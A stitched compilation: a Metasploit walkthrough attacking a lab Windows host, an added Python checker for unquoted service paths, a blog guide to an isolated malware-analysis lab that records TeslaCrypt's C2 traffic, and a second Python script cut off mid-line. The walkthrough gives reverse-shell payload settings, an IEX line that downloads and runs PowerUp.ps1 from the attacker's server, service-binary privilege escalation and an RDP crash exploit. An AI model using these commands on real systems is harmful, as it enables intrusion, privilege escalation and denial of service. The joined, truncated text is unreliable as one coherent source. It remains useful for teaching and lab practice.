To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. 
Meterpreter is an advanced multi-function payload that is superior to other payloads: in contrast to other payloads that execute one command (such as adding a user or spawning a shell), Meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, install backdoors, escalate privileges and so on. Another significant advantage is that Meterpreter fully resides in memory by using DLL injection into existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by antiviruses or intrusion detection systems. To attach a Meterpreter payload to our exploit, use the following command:

    set payload windows/meterpreter/reverse_tcp

If you run show options again now, you will see that the payload options are visible:

LHOST: the host where the Meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241
LHOST: the port where the Meterpreter will connect back to. Choose any available port you like or leave it on 4444.

Set our listen address to our own address:

    set LHOST 192.168.0.241

We're set to fire the exploit. Simply type:

    exploit

As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a Meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are a number of options available, but always try the easy way first. Execute getsystem to have Meterpreter try a few tricks up its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell.
A very powerful Windows privilege escalation framework is PowerSploit, written in PowerShell. We downloaded and extracted the zip file on our Desktop in a folder PowerSploit. We will start a web server with PowerShell, so we can easily call them via our Meterpreter shell. Navigate to the unzipped folder and start a web server via the following command:

    python -m SimpleHTTPServer

Let's return to our Meterpreter session. It is possible to spawn a PowerShell shell within Meterpreter, but it's far easier to load scripts such as PowerSploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the Meterpreter session and add a PowerShell payload instead of a Meterpreter payload to our exploit by entering the command below. Quickly check show options to verify that the listen address is still correct.

    set payload windows/powershell_reverse_tcp

And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We cannot just download PowerSploit to our target system, as this will more than likely raise red flags with antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script into memory, execute the following command in PowerShell:

    IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1")

Next, we execute a function from the script called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation.
To make it easier to read, we will output the result to a file named allchecks.txt:

    Invoke-AllChecks | Out-File allchecks.txt

To check out the results, open a new terminal, launch a new instance of Metasploit and get the Meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port, as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a Meterpreter shell. To download the allchecks.txt file, execute download allchecks.txt with Meterpreter. Download a copy of the allchecks.txt here.

As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted service paths, hackable DLL locations, unattended install files, etc. Let's focus on these unquoted service paths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added. As services are run by the system user, this would mean that our custom command is also executed as the system user. Nice! The catch, however, is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. For example, for abusing the service Jenkins, we would need to execute the following command:

    Install-ServiceBinary -Name 'jenkins'

Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted service paths. Let's check manually in our open Meterpreter shell. First get a Windows Command Line by executing shell.
Execute the following command:

    wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Using this method, we find 4 possibly vulnerable services. One of these services, OpenSSHd, was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the README of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group.

    Install-ServiceBinary -Name 'OpenSSHd'

Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and execute it. This exploit sends a sequence of specially crafted RDP packets to an affected system, causing it to crash and reboot. (Make sure to watch your Metasploitable 3 VM when launching this exploit.) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the Meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group.
We know from the PowerSploit README that his password is Password123!. The next step is to actually log in with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote desktop. It could be very useful for enumeration of the box or disabling firewall (rules) if PSExec does not work.

Source: https://www.zero-day.io/metasploitwalkthrough/
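The wmic one-liner above is the manual check behind PowerUp's unquoted-service-path finding. The following Python script is an added example (not from the post, Metasploit or PowerSploit) that parses that wmic table and, for each auto-start service outside C:\Windows with an unquoted path containing spaces, lists the directories whose ACLs an administrator should audit; the service names and paths in the sample table are constructed, except OpenSSHd, which the post names.

```python
"""Audit helper for unquoted service paths (added example, not PowerSploit code).

The Service Control Manager resolves an unquoted path with spaces by trying
each space-delimited prefix in turn (C:\\Program.exe before
C:\\Program Files\\...\\svc.exe). Every directory that could hold such a
prefix therefore needs a write-ACL review; this script names them.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Service:
    name: str
    display_name: str
    path_name: str
    start_mode: str


@dataclass
class Finding:
    service: str
    path: str
    dirs_to_audit: list[str]   # directories the SCM would consult before the real binary


# Constructed sample rows (DisplayName, Name, PathName, StartMode); only
# OpenSSHd comes from the post, the rest are made up for the demo.
SAMPLE_ROWS = [
    ("Jenkins", "jenkins", r'"C:\Program Files\Jenkins\jenkins.exe"', "Auto"),
    ("OpenSSH Server", "OpenSSHd", r"C:\Program Files\OpenSSH\bin\cygrunsrv.exe", "Auto"),
    ("Example Updater", "exupd", r"C:\Tools\Example Updater\svc.exe --quiet", "Auto"),
    ("Example Backup", "exbak", r"C:\Tools\Example Backup\bak.exe", "Manual"),
    ("Windows Time", "W32Time", r"C:\Windows\system32\svchost.exe -k LocalService", "Auto"),
    ("NoSpace Service", "nospace", r"C:\Srv\nospace.exe", "Auto"),
]
COLUMNS = ("DisplayName", "Name", "PathName", "StartMode")


def render_wmic_table(rows=SAMPLE_ROWS, columns=COLUMNS) -> str:
    """Mimic wmic's space-padded table: each column is as wide as its widest value."""
    widths = [max(len(v) for v in [col] + [r[i] for r in rows]) + 2
              for i, col in enumerate(columns)]
    lines = ["".join(v.ljust(w) for v, w in zip(columns, widths)).rstrip()]
    for row in rows:
        lines.append("".join(v.ljust(w) for v, w in zip(row, widths)).rstrip())
    return "\n".join(lines)


SAMPLE_WMIC = render_wmic_table()


def parse_wmic_table(text: str) -> list[Service]:
    """Parse the fixed-width table using the header's column start offsets."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    cols = [(m.group(0), m.start()) for m in re.finditer(r"\S+", header)]
    services = []
    for row in rows:
        cell = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else len(row)
            cell[name] = row[start:end].strip()
        services.append(Service(cell["Name"], cell["DisplayName"],
                                cell["PathName"], cell["StartMode"]))
    return services


def find_unquoted_service_paths(services: list[Service]) -> list[Finding]:
    """Apply the post's filters (auto-start, outside C:\\Windows, no quotes),
    then keep only paths that actually contain a space and compute the
    directories where a stray prefix binary would be picked up."""
    findings = []
    for svc in services:
        path = svc.path_name.strip()
        if svc.start_mode.lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        if path.startswith('"'):
            continue                      # quoted: the SCM knows the exact file
        space_positions = [i for i, ch in enumerate(path) if ch == " "]
        if not space_positions:
            continue                      # unquoted but unambiguous
        dirs: list[str] = []
        for pos in space_positions:
            parent = str(PureWindowsPath(path[:pos]).parent)
            if parent not in dirs:
                dirs.append(parent)
        findings.append(Finding(svc.name, path, dirs))
    return findings


if __name__ == "__main__":
    for f in find_unquoted_service_paths(parse_wmic_table(SAMPLE_WMIC)):
        print(f"{f.service}: {f.path}\n  audit write ACLs on: {', '.join(f.dirs_to_audit)}")
```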
21. In this post we will set up a virtual lab for malware analysis. We'll create an isolated virtual network separated from the host OS and from the Internet, in which we'll set up two victim virtual machines (Ubuntu and Windows 7) as well as an analysis server to mimic common Internet services like HTTP or DNS. Then, we'll be able to log and analyze the network communications of any Linux or Windows malware, which will unknowingly connect to our server instead of the Internet. We demonstrate the setup with a real life use case where we analyze the traffic of the infamous TeslaCrypt ransomware, a now defunct ransomware which infected a large number of systems from 2015 to mid-2016.

Diagram of our future setup. Note that the machines in the virtual network will be isolated from the host OS and will not be able to connect to the Internet.

This guide includes quite a lot of material, so here's a table of contents to give you an overview of what we'll cover and let you jump directly to a section if you'd like.

Creating the virtual machines
Setup of the analysis machine: INetSim, Burp
Creating an isolated virtual network
Creating and restoring snapshots
Using INetSim and Burp on the analysis machine to analyze the network traffic
Setting up a shared folder between the analysis machine and the host OS
Demo time: the TeslaCrypt ransomware
Conclusion

1. Creating the virtual machines

Here are two links you can use to download Ubuntu and Windows 7 virtual machine images.

Ubuntu (victim machine 1 and analysis machine): download Ubuntu 16.10 64 bits from OsBoxes (direct link)
Windows 7 (victim machine 2): download from the Microsoft Developer Website (select IE 11 on Win 7 (x86) and VirtualBox)

Tip: if you already have an Ubuntu virtual machine you're not using, you can simply clone it and reuse it in the next steps (right click > Clone).

Before starting, make sure you have enough disk space available (I'd recommend at least 10-20 GB).
Base Ubuntu machine

OsBoxes provides us with a ready-to-go virtual disk that we can simply plug into a VM and start using right away. Start by extracting the archive you just downloaded.

    $ 7za e Ubuntu_16.10_Yakkety-VB-64bit.7z

You'll be provided with a VDI file representing the virtual disk of the machine. We'll start by setting up the base Ubuntu image, which we will then clone to have our two Ubuntu VMs. In VirtualBox, create a new machine (New button), and call it Ubuntu analysis. Then, select how much RAM you want to give it. At this point, VirtualBox will ask you if you wish to create a new virtual hard disk or use an already existing one. Select Use an existing virtual hard disk file, click on the directory icon at the right of the dropdown list, and select the VDI file. You can then power up the machine. The default password is osboxes.org.

Basic setup

The default keyboard uses the QWERTY layout. If like me you're not familiar with it, start by changing it (Settings > Text Entry). Optionally, you can also change the default password using:

    $ passwd osboxes

It can also be a good idea to update your packages.

    $ sudo apt-get update
    $ sudo apt-get upgrade

Install the guest additions

Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs. You will then be asked if you want to run the installer; answer yes, and enter the default password (by default osboxes.org). Once the installation is complete, power off the VM.

Cloning

Now that you have a basic Ubuntu VM ready to go, clone it (right click on it in the main VirtualBox interface > Clone). Name the clone Ubuntu victim, and check the checkbox to reinitialize its MAC address. Select Full clone for the type of clone.

The two Ubuntu VMs created

Windows 7 machine

The download link I provided earlier points to a ZIP archive containing an OVA file.
Unlike a VDI file it's not only a virtual disk, but a full description of the virtual machine (including its virtual disk), so the only thing you need to do to create a virtual machine from it is to select File > Import Appliance in the main window of VirtualBox. If you can afford it, it's probably better to give it at least 1024 MB of RAM. Once the import process is complete (it can take a few minutes), rename the VM Windows 7 victim and power it on.

Install the guest additions

Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs, and run the installer from the virtual CD which has been inserted. When you're done, power off the machine.

2. Setup of the analysis machine: INetSim, Burp

INetSim

INetSim is a very handy and powerful utility that allows you to simulate a bunch of standard Internet services on a machine. By default, it will among others emulate a DNS, HTTP and SMTP server that you can easily tune. Since we'll later configure our victim machines to have no Internet access, we will need INetSim to simulate it. There are several ways to install INetSim. The easiest is to run the following commands (in the analysis machine).

    $ sudo su
    $ echo "deb http://www.inetsim.org/debian/ binary/" > /etc/apt/sources.list.d/inetsim.list
    $ wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add -
    $ apt update
    $ apt install inetsim

Note: in order to be able to copy-paste those commands in your analysis machine, select Devices > Shared Clipboard > Bidirectional.

We'll come back later on how to use INetSim.

Burp

Unfortunately, it seems that INetSim's SSL support is quite limited: it comes with a certificate for a single host (inetsim.org) and doesn't support generating SSL certificates on the fly. This is a problem since most malware nowadays encrypts its communications with SSL. We'll use Burp as a transparent SSL proxy, which will stand in the middle between the victim machines and INetSim for SSL connections.
If you don't need to intercept SSL traffic for now, you won't necessarily need Burp. Burp supports generating on-the-fly SSL certificates for any host our victim machines will connect to. It also creates a single root CA certificate, which we'll later import in our victim machines. This way, we'll be able to intercept the encrypted communications that our malware sends. You can download Burp from the official website. The download is a bash installation script; run it to install Burp:

    $ bash ~/Downloads/burpsuite_free_linux_v1_7_23.sh

By default, the Burp executable will be ~/BurpSuiteFree/BurpSuiteFree.

3. Setting up an isolated virtual network

As a reminder, we want to set up an isolated network containing our three VMs. This network will not be able to access the Internet. Also, we want the analysis machine to act as a network gateway to the victim machines in order to easily be able to intercept the network traffic and to simulate various services such as DNS or HTTP. In order to achieve this, we will use a VirtualBox Internal Network. For those familiar with VirtualBox, an internal network differs from a host-only network in that an internal network cannot access the host machine at all. For each of your three virtual machines, do the following:

Open its settings
Go to the Network section
Change the Attached to field to Internal network
Enter malware-analysis-network as the network name

Network configuration

Analysis machine

Power on the analysis machine, open a terminal, and run the ifconfig command. You should have an interface named enp0s3. If the name differs, just adapt it in the instructions to follow. Open the file /etc/network/interfaces as root, and add the following at the end:

    auto enp0s3
    iface enp0s3 inet static
        address 10.0.0.1
        netmask 255.255.255.0

This will assign the machine the static IP 10.0.0.1 on our virtual network.
Now that we have configured the network interface, we need to start it up using:

    $ sudo ifup enp0s3

Ubuntu victim machine

The process is very similar here, except that we'll assign it the static IP 10.0.0.2, and instruct it to use 10.0.0.1 as a gateway and as a DNS server. Append the following at the end of the file /etc/network/interfaces:

    auto enp0s3
    iface enp0s3 inet static
        address 10.0.0.2
        gateway 10.0.0.1
        netmask 255.255.255.0
        dns-nameservers 10.0.0.1

And run:

    $ sudo ifup enp0s3
    $ sudo service networking restart

You should now be able to ping the analysis machine:

    $ ping 10.0.0.1
    PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
    64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms
    64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms

Windows 7 victim machine

Right-click on the network icon in the taskbar (or go to Start Menu > Control Panel > Network and Internet > Network and Sharing Center), click on Local Area Connection 2 > Properties, select Internet Protocol Version 4, and click on the Properties button. We'll assign the static IP 10.0.0.3 to the machine, and configure the rest similarly to the Ubuntu victim machine.

Network settings

Make sure to validate the settings (click on OK, Apply, etc. until all the settings windows are gone). You should now be able to ping the analysis machine:

    > ping 10.0.0.1
    Pinging 10.0.0.1 with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time<1ms TTL=64
    Reply from 10.0.0.1: bytes=32 time<1ms TTL=64

All set!

4. Creating and restoring snapshots

Now that our victim VMs are properly configured and are in a clean state (i.e. not infected by any kind of malware), we are going to make a snapshot of their current state. This way, we will be able to easily reset them to this clean state at any point in time. VirtualBox makes this very easy: in the window in which the VM is running, just select Machine > Take Snapshot. You can name the snapshot Clean state.
Make sure to do this for both your Ubuntu and Windows 7 victim machines. It doesn't hurt to do it for your analysis machine as well. When you want to reset a machine to its clean state, simply power it off and check the checkbox Restore current snapshot 'Clean state'.

5. Using INetSim and Burp on the analysis machine to analyze the network traffic

INetSim

As previously mentioned, INetSim enables us to simulate a wide range of standard Internet services including DNS, HTTP(S), SMTP, etc. It has a default configuration file /etc/inetsim/inetsim.conf which is very well documented. It also ships with a data directory (/var/lib/inetsim) containing various default files. Since you'll probably want a different INetSim configuration each time you make a new analysis, I suggest you create a directory analysis which will contain a sub directory for each analysis.

    $ mkdir analysis

We'll already create a sub directory for the sake of example, and copy the default INetSim configuration file and data folder in it.

    $ mkdir analysis/test-analysis
    $ cp /etc/inetsim/inetsim.conf analysis/test-analysis
    $ sudo cp -r /var/lib/inetsim analysis/test-analysis/data
    $ sudo chmod -R 777 data
    $ cd analysis/test-analysis

By default, INetSim listens on the local interface only. To make it available to all the machines of our virtual network, replace the following line in the configuration file we just copied:

    #service_bind_address 10.0.0.1

By:

    service_bind_address 0.0.0.0

Now, we need to disable systemd-resolved, which is a local DNS server shipped by default with Ubuntu and will conflict with INetSim's DNS server.

    $ sudo systemctl disable systemd-resolved.service
    $ sudo service systemd-resolved.service stop

By default, INetSim's DNS server will resolve all the domain names to 127.0.0.1.
We want any domain name to resolve to 10.0.0.1 (the analysis machine IP) instead; uncomment the following line:

    #dns_default_ip 10.0.0.1

I mentioned earlier that INetSim's SSL support is not optimal since it only has a single certificate for a single hostname (inetsim.org) and doesn't allow generating per-host certificates on the fly. To overcome that, we'll run Burp on port 443 as a transparent proxy in front of INetSim. Therefore, we need to bind INetSim's HTTPS server to a different port, say port 8443. Replace the following line:

    #https_bind_port 443

By:

    https_bind_port 8443

Now, let's run INetSim!

    $ sudo inetsim --data data --conf inetsim.conf
    INetSim 1.2.6 (2016-08-29) by Matthias Eckert & Thomas Hungenberg
    [...]
    === INetSim main process started (PID 3605) ===
    Session ID:     3605
    Listening on:   0.0.0.0
    Real Date/Time: 2017-06-04 12:58:07
    Fake Date/Time: 2017-06-04 12:58:07 (Delta: 0 seconds)
    Forking services...
      * dns_53_tcp_udp - started (PID 3621)
      * irc_6667_tcp - started (PID 3631)
      * daytime_13_tcp - started (PID 3638)
      * discard_9_tcp - started (PID 3642)
      * discard_9_udp - started (PID 3643)
      * ident_113_tcp - started (PID 3634)
      * syslog_514_udp - started (PID 3635)
    [...]

As you can see, INetSim has launched a bunch of network services. Those are all configurable and can be disabled in the configuration file. This configuration file is very well documented and explains all the options of INetSim; I recommend you take a few minutes to read it.

Now, power on one of your victim VMs, open a web browser, and browse to any address (e.g. github.com). You should see the following:

(Note that this default file corresponds to the HTML file data/http/fakefiles/sample.html.)

Back on the analysis machine, shut down INetSim (CTRL + C).

      * dns_53_tcp_udp - stopped (PID 3621)
      * irc_6667_tcp - stopped (PID 3631)
      * daytime_13_tcp - stopped (PID 3638)
    [...]
    Simulation stopped.
    Report written to '/var/log/inetsim/report/report.3877.txt' (24 lines)

As you can see, INetSim has created a summary report for us. It contains all the interactions our victim machine had with INetSim services.

    === Report for session '3877' ===
    Real start date            : 2017-06-04 13:18:27
    Simulated start date       : 2017-06-04 13:18:27
    Time difference on startup : none
    2017-06-04 13:18:38  First simulated date in log file
    2017-06-04 13:18:40  DNS connection, type: A, class: IN, requested name: github.com
    2017-06-04 13:18:40  HTTP connection, method: GET, URL: http://github.com/, file name: data/http/fakefiles/sample.html
    2017-06-04 13:18:40  HTTP connection, method: GET, URL: http://github.com/favicon.ico, file name: data/http/fakefiles/sample.html
    2017-06-04 13:18:40  Last simulated date in log file

Burp for SSL interception

To be able to analyze the SSL traffic, we also need to run Burp. We'll run it as a transparent proxy in front of INetSim. When a victim machine initiates an SSL connection, it will first go to Burp, which will then proxy it to INetSim. This section is not mandatory: if you don't need to intercept SSL traffic right now, just jump to the next section. Here's how it will look with Burp in the middle:

Start Burp as root:

    $ sudo /home/osboxes/BurpSuiteFree/BurpSuiteFree

(We need to run it as root, otherwise it won't be able to bind port 443, which is a privileged port. There are other ways to do this, but let's not bother here.)

Create a temporary project (you don't have any other options with the free version anyway), and go to the Proxy tab, then to the Options sub-tab. You'll see Burp's default listener listening on port 8080. Click on the row corresponding to the default listener, and edit it (Edit button).
Configure it as follows:

Binding tab:
    Bind to port: 443
    Bind to address: all interfaces
Request handling tab:
    Redirect to host: localhost
    Redirect to port: 8443
    Check Support invisible proxying

Validate the settings, and you should get a listener similar to:

By default, Burp intercepts the incoming requests and waits for you to explicitly let them pass through. To avoid this, go to the Intercept tab and click the button Intercept is on to disable it.

Since Burp Free doesn't allow you to save a project, you can export the settings we just made in order to import them next time you start Burp. To do this, use Burp > Project options > Save project options.

Let's make sure our setup is working correctly. Start INetSim, and run:

    $ curl --insecure https://localhost

You should get:

    <html>
      <head>
        <title>INetSim default HTML page</title>
      </head>
      <body>
        <p></p>
        <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
        <p align="center">This file is an HTML document.</p>
      </body>
    </html>

Importing Burp's CA certificate on our victim machines

Power on your Windows 7 victim machine, and try to browse to an HTTPS URL (e.g. https://github.com); you'll see a warning similar to:

This is because Burp generates an SSL certificate signed by its own CA certificate, which our victim machine doesn't trust for now. In Burp, add a new proxy listener on port 8080, listening on all interfaces (tab Proxy > Options > button Add):

Then, from the victim machine, browse to http://10.0.0.1:8080. Click on CA Certificate in the top-right corner to download Burp's CA certificate.
On the Windows 7 victim machine: open the file, click Install certificate > Next > Place all certificates in the following store: Trusted Root Certification Authorities > Next

On the Ubuntu victim machine:

Convert the certificate to the appropriate format (.crt) using

    $ openssl x509 -in ~/Downloads/cacert.der -inform DER -out burp.crt

Copy it to /usr/local/share/ca-certificates

    $ sudo cp burp.crt /usr/local/share/ca-certificates/

Run

    $ sudo update-ca-certificates

Firefox by default doesn't use the system's certificate store. If you want the SSL connection to work properly in Firefox as well, go to the Firefox settings into Advanced > Certificates > Import. Choose burp.crt, check Trust this CA to identify websites.

All set! Once you have imported Burp's CA certificate in the victim machines, make sure to create a new snapshot (e.g. Clean state with Burp's CA certificate installed).

6. Setting up a shared folder between the analysis machine and the host OS

At some point, you'll obviously want to transfer some files to the analysis machine or to one of the victim machines; we'll set up a file share to achieve it. In the VirtualBox window running the analysis machine, go to Devices > Shared Folders > Shared folders settings. Create a new shared folder, choose the local folder of your host OS it should be mapped to, and choose a name. Check the checkbox to make it permanent.

Now on the analysis machine, mount the shared folder:

    $ mkdir ~/malware-analysis-share
    $ sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) malware-analysis-share ~/malware-analysis-share

And you're good to go. In my case, all the files of my host machine located in /home/christophetd/malware-analysis-share will also end up in ~/malware-analysis-share in the analysis machine.

Transferring files to a victim machine

At some point, you'll most probably need to transfer some files (e.g. malware samples) to one of the victim machines.
Setting up a file share for them is a bad idea, because it means the victim machine (and by extension, the malware sample you're running on it) has access to it. The simplest way to achieve a file transfer to the Ubuntu victim machine is to use netcat. Here's a quick example.

    # Receiving machine having IP 10.0.0.2
    $ nc -lvp 4444 > file.exe

    # Analysis machine (sender)
    $ cat file_to_transfer.exe | nc 10.0.0.2 4444

For a Windows victim, we unfortunately don't have netcat available. Alternatives might exist, but they probably don't ship by default. One option is to use INetSim to serve your file to the victim machine.

    # inetsim.conf
    # Remove the default line:
    http_fakefile exe sample_gui.exe x-msdos-program
    # Replace it by
    http_fakefile exe file_to_transfer.exe x-msdos-program
    # And put file_to_transfer.exe in ./data/http/fakefiles

With this configuration, just browse any URL ending with '.exe' (e.g. http://github.com/file.exe).

7. Demo time: the TeslaCrypt ransomware

Time for a quick demo! I downloaded a sample of the ransomware TeslaCrypt, transferred it to our Windows 7 victim machine, and executed it. After a few seconds, all the files of the VM have been encrypted and the following window pops up.

TeslaCrypt main window (click for full-size image)

The machine's files have been encrypted and replaced by files with the ECC extension

After checking the logs of INetSim, we can see that the ransomware did the following DNS lookups:

    7tno4hib47vlep5o.tor2web.org
    7tno4hib47vlep5o.tor2web.blutmagie.de
    7tno4hib47vlep5o.tor2web.fi
    bitcoin.toshi.io

And sent several HTTP requests to those domains.
    HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA=
    HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
    HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
    HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT

We see similar requests are made to tor2web.org, tor2web.blutmagie.de and tor2web.fi. Those services allow access to the Tor network without having to install Tor Browser or a similar tool. The malware contacts the Tor hidden service 7tno4hib47vlep5o.onion, which is probably some kind of C&C server. The payload of the request is a base64 encoded string, which decodes to:

    Subject=Ping
    &key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3
    &addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT
    &files=0
    &size=0
    &version=0.2.6a
    &date=1496648675
    &OS=7601
    &ID=16
    &subid=0
    &gate=G1

It also makes an API call to bitcoin.toshi.io (which doesn't exist anymore), most probably to check if the ransom has been paid to the bitcoin address 1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT.
It seems like the malware generates a unique bitcoin address for each infected computer, since the address didn't receive or send out any money.

Conclusion

Hopefully this guide will be helpful and allow you to safely analyze the network interactions of a malware sample. Keep in mind that some malware detects when it is being run in a virtual machine and might adapt its behavior (e.g. do nothing). Here's an article from MalwareBytes on the subject. Also, remember that while analyzing a malware's network traffic can be very useful, it's only one kind of dynamic analysis. Others include monitoring the registry, the system calls, the files opened / created, etc. Open Security Training offers a full hands-on course on the topic, for free.

Don't hesitate to leave a comment if you found this guide useful / awesome / too long / too detailed. A big thank you to lbarman for the proofreading and numerous suggestions. Stay safe!

Source: https://blog.christophetd.fr/set-up-your-own-malware-analysis-lab-with-virtualbox-inetsim-and-burp/
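The INetSim report format shown in section 5 and the base64 check-in decoded by hand in the TeslaCrypt demo are the two things an analyst reads after every run. This Python script is an added example (not from the post and not INetSim's own code) that parses report lines into records and decodes any HTTP(S) request whose query string is a single base64 blob into its key/value fields; the sample report is constructed, and the beacon's key and bitcoin address are placeholders rather than the real sample's values.

```python
"""Parse an INetSim session report and decode TeslaCrypt-style check-in URLs.

Added example, not INetSim code. Report lines look like
'2017-06-04 13:18:40  HTTP connection, method: GET, URL: http://...'.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Constructed beacon modelled on the decoded payload in the post; key and
# addr are placeholders. It is base64-encoded here so the sample is exact.
_FAKE_BEACON = ("Subject=Ping&key=PLACEHOLDER_KEY&addr=1PlaceholderAddr"
                "&files=0&size=0&version=0.2.6a&date=1496648675&OS=7601"
                "&ID=16&subid=0&gate=G1")
_FAKE_B64 = base64.b64encode(_FAKE_BEACON.encode()).decode()

# Constructed report in the format INetSim writes to report.<pid>.txt.
SAMPLE_REPORT = f"""\
=== Report for session '3877' ===
Real start date            : 2017-06-04 13:18:27
Simulated start date       : 2017-06-04 13:18:27
Time difference on startup : none
2017-06-04 13:18:38  First simulated date in log file
2017-06-04 13:18:40  DNS connection, type: A, class: IN, requested name: 7tno4hib47vlep5o.tor2web.org
2017-06-04 13:18:40  HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?{_FAKE_B64}
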